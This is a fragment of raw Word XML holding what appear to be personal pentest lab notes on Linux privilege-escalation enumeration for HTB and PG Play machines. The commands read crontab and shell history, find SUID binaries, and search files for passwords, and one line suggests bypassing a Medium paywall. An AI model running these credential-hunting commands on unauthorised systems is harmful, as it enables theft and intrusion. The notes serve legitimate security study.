    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001587">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001588">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001589">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate the root processes running on the machine using ps and grep:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps auxww | grep root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Worked in the Pilgrimage HTB</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic System Enumeration (from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId427">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cheatsheet </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">above):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001590">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lscpu </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001591">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001592">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /var/www/html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001593">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001594">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001595">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulpn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(display active network connections and listening ports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for windows while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulpn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001597">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root | grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001598">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001599">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(display network routing tables)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -type f -exec grep -i -I "PASSWORD=" {} /dev/null \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">locate pass | more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More Basic System Enumeration (from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId428">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId429">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paid version of writeup from Medium but you can just use freedium to get it for free</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId43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free version from freedium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l (check what commands current user can run with sudo privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab (cronjobs running)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat .bash_history (passwords saved in history)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env (passwords saved in environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -ar (kernel exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/*-release (kernel exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp (check for any potential services running)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null (capabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null (SUID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -g=s -type f 2&gt;/dev/null (SGID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo --version (public exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id (check for docker and lxd group)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId431">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw Docker group and exploited it that way. Look at the "Docker" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/passwd (writable /etc/passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/shadow (writeable /etc/shadow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep -i "root" --color=auto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rnH "password" .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rnH "password" .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
